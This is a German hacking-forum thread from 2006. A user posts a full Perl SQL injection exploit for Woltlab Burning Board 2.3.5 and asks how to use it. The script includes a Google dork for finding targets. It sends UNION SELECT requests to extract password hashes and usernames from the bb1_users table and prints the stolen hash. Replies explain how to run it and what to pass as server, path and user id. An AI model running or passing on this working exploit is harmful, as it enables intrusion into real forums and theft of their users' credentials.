Hilfe mit Exploit

Dieses Thema im Forum "Sicherheit & Datenschutz" wurde erstellt von breaKdown.iNC, 26. Oktober 2006 .

Schlagworte:
Status des Themas:
Es sind keine weiteren Antworten möglich.
  1. Diese Seite verwendet Cookies. Wenn du dich weiterhin auf dieser Seite aufhältst, akzeptierst du unseren Einsatz von Cookies. Weitere Informationen
  1. #1 26. Oktober 2006
    Hallo,

    also ich habe mir grade mal kurz die Regeln fürs Hacker Forum durchgelesen und ich glaube das es laut denen erlaubt ist, jemand zu fragen ob er so nett wäre mir nen Exploit zu kompilieren^^

    ... wär einer so nett?^^

    Code:
    #!/usr/bin/perl
    
    use IO::Socket;
    
    print q{
    ################################################################################
    ## ##
    ## Woltlab Burning Board 2.3.5 <= "links.php" SQL Injection Exploit ##
    ## - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ##
    ## Exploit by | hias ##
    ## Googledork | inurl:/wbb2/links.php?cat ##
    ## Usage | links.pl [server] [path] [userid] ##
    ## - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ##
    ## ##
    ################################################################################
    
    };
    
    $webpage = $ARGV[0];
    $directory = $ARGV[1];
    $userid = $ARGV[2];
    
    if (!$webpage||!$directory) { die "[+] Exploit failed\n"; }
    
    $wbb_dir = 
    "http://".$webpage.$directory."links.php?cat=5474902010+union+select+password,username+from+bb1_users+where+userid=$userid";
    
    $sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$webpage", 
    PeerPort=>"80") || die "[+] Can't connect to Server\n";
    print "[+] Exploiting.....\n";
    print $sock "GET $wbb_dir HTTP/1.1\n";
    print $sock "Accept: */*\n";
    print $sock "User-Agent: Hacker\n";
    print $sock "Host: $webpage\n";
    print $sock "Connection: close\n\n";
    
    while ($answer = <$sock>) {
    if ($answer =~ 
    /(................................)<\/span><\/b><\/font>/) {
    print "[+] Hash: $1\n";
    exit();
    }
    if ($answer =~ /SQL-DATABASE ERROR/) {
    break;
    }
    }
    
    $wbb_dir = 
    "http://".$webpage.$directory."links.php?cat=5474902010+union+select+password,userid+from+bb1_users+where+userid=$userid";
    close($sock);
    
    $sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$webpage", 
    PeerPort=>"80") || die "[+] Can't connect to Server\n";
    print $sock "GET $wbb_dir HTTP/1.1\n";
    print $sock "Accept: */*\n";
    print $sock "User-Agent: Hacker\n";
    print $sock "Host: $webpage\n";
    print $sock "Connection: close\n\n";
    
    while ($answer = <$sock>) {
    if ($answer =~ 
    /(................................)<\/span><\/b><\/font>/) {
    print "[+] Hash: $1\n";
    exit();
    }
    if ($answer =~ /SQL-DATABASE ERROR/) {
    print "[+] Database doesn't exist. try replacing bb1_users with bb2_users or bb3_users\n";
    break;
    }
    }
    close($sock);
    
    print "[+] Exploit failed\n";
    
    
    # bb-pcsecurity.de - always be up to date
    

    wenns nciht erlaubt ist, bitte sagen, dann is die geschichte hier zu!

    thx im voraus!
     

  2. Anzeige
    Dealz: stark reduzierte Angebote finden.
  3. #2 26. Oktober 2006
    AW: Hilfe mit Exploit

    Das einzige was du machen musst, ist den Text in eine Datei (z.B. exploit.pl) zu packen, und es mit einem Perl-Interpreter zu starten ;)
     
  4. #3 26. Oktober 2006
    AW: Hilfe mit Exploit

    Ok, das krieg ich bestimmt auc noch hin....wie siehts denn aus mit dem Usage, das rall ich nciht wirklich:

    Usage | links.pl [server] [path] [userid]

    was mussn bei Server rein? Die IP? Und bei Path? Und bei UserID?...rall ich nicht, muss das aber unbedingt wissen^^

    thx im voraus!
     
  5. #4 26. Oktober 2006
    AW: Hilfe mit Exploit

    schau dir das doch mal genauer an:

    Code:
    "http://".$webpage.$directory."links.php?cat=5474902010+union+select+password,userid+from+bb1_users+where+userid=$userid";
    
    deine userid hier im board ist 2882....

    Diese Hilfe sollte reichen.... schritt für schritt anleitung gibt es nicht...


    *closed
     

  6. Videos zum Thema
Die Seite wird geladen...